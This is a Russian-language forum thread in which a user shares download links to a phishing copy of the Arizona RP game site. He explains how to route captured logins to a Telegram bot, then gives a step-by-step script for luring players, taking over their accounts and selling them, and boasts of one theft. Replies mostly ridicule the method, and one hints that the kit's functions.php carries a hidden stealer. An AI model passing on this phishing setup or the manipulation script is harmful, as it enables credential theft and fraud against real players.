Загрузка...

Серое Копия сайта аризоны для ******а, а так-же как на этом делать деньги

Тема в разделе Способы заработка создана пользователем ShohruhBIG 30 июл 2023. (поднята 30 июл 2023) 1847 просмотров

1. ShohruhBIG
    ShohruhBIG Автор темы 30 июл 2023 Заблокирован(а) 1 14 авг 2019
    Всем салам алейкум, сегодня расскажу как создать копию сайта аризоны рп и на этом делать лютые бабки.

1. Устанавливаем саму копию сайта
    Ссылка на Yandex Disk, Google Disk
    https://disk.yandex.ru/d/g1FVopngt0Wf8A

https://drive.google.com/file/d/1e7qdwWIjrvJjFGovF45MhDA4AT4l_mcX/view?usp=sharing

2. Делаем так чтобы данные поступали вам TELEGRAM
    В папке есть файл login, открываем его, далее мы видим это фотоВставляем свой токен бота и свой чат ид
    токен можно взять у этого бота: BotFather
    Ид чат можно взять у этого бота: @TgramUserIDBot

3. Заливаем в хостинг
    Если вы шарите, то просто перкидывайте все в хост через файловый менеджер

На этом все, теперь как можно заработать деньги на этом
    Карочи, заходим в Фанпей, регаем аккаунт себе, потом ищем жертву с акком в сампе, пишем ему может ли он дать скрин отсюда, кидаем ему ссылку на ******овый сайт, если получится, то он зайдет по вашей ссылке, вам придут данные, после говорите, поменяй почту на Mail.ru и сделай пароль в почте как пароль от аккаунта самп, далее он делает, вы заходите на почту и меняете пароль на почте и в сампе, и продаете этот аккаунт, с помощью данного способа я за часа 3 смог украсть аккаунт 90 лвл на аризоне мобайл 2, кому интересно ник Baxa_Perekupov, он в бане уже, но я успел продать вирты там

Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
  2. kingofchocopie
    kingofchocopie 30 июл 2023 :life: 3678 13 мар 2023
    1. Посмотреть предыдущие комментарии (1)
    2. ShohruhBIG Автор темы
      kingofchocopie, это байт на такие сообщения бро)
  3. kriper2004
    kriper2004 30 июл 2023 #ядумалатынетакой 2946 13 июн 2022
    сам путин консультируется с ним по поводу развитию молодого поколения

4. np42ktgjajha
    [IMG]открой доступ

5. OneEeyder
    OneEeyder 31 июл 2023 Заблокирован(а) 25 31 июл 2023
    Поменяй пароль и почту) Где такого найти? мне кажется он сам тебе и без ****** сайта всё скажет))

1. ShohruhBIG Автор темы
      OneEeyder, Ну смотри, после того как мне данные приходят, я писал смени почту на почту майл ру, а на почте ставить такой же пароль как на акке аризоны, это работало
  6. АртёмДзюба
    АртёмДзюба 31 июл 2023 Заблокирован(а) 2102 25 ноя 2020
    Гениальный способ, иди нахуй реально. Без обид, но тема мусорная, Аризона себя изживает..
    1кк=3-9₽
    На каждом активном аккаунте стоит почта, мб двухфакторка
    Почта не дает сменить ничего))
    +опытный игрок на арз на такое не поведется.
    Поведется только долбаеб 10-ти летний который элементарно ссылки не чекает. С него поиметь нечего, + у админов есть такая ахуенная штука как LogPass там ИИ Которая чекает входы, и если вход с другого ипа (дальше 100км от места регистрации) то она просто морозит аккаунт и просит код с почты который ты хуй получить, если конечно у этого челикс пароль на почте такой же как аккаунте.
    Способ древний, года 3 назад мог бы зарабатывать по 2 косаря в неделю, сейчас даже 500-ста в неделю не сможешь..

1. Посмотреть предыдущие комментарии (1)
    2. АртёмДзюба
      АртёмДзюба, ну а если вы ебанат, то советую спиженые аккаунты продавать на сампсторе)
    3. ShohruhBIG Автор темы
      АртёмДзюба, Чел, я способ рассказал как на фанпее добывать акки, ты пишешь оплачу после того как отвяжешь все, у меня так на удочку попался акк с 90 лвлом. А то что там ацепт трейд нужен, то его можно обойти, через обмен имуществом можно передать все на свой акк и там не потребует код
    4. АртёмДзюба
      ShohruhBIG, тебе такая омеба и без сайта все даст
  7. klarvy
    klarvy 4 сен 2023 91 20 июл 2020
    [IMG]а а почему не рассказал об файлике functions.php?) стилл *****?

Загрузка...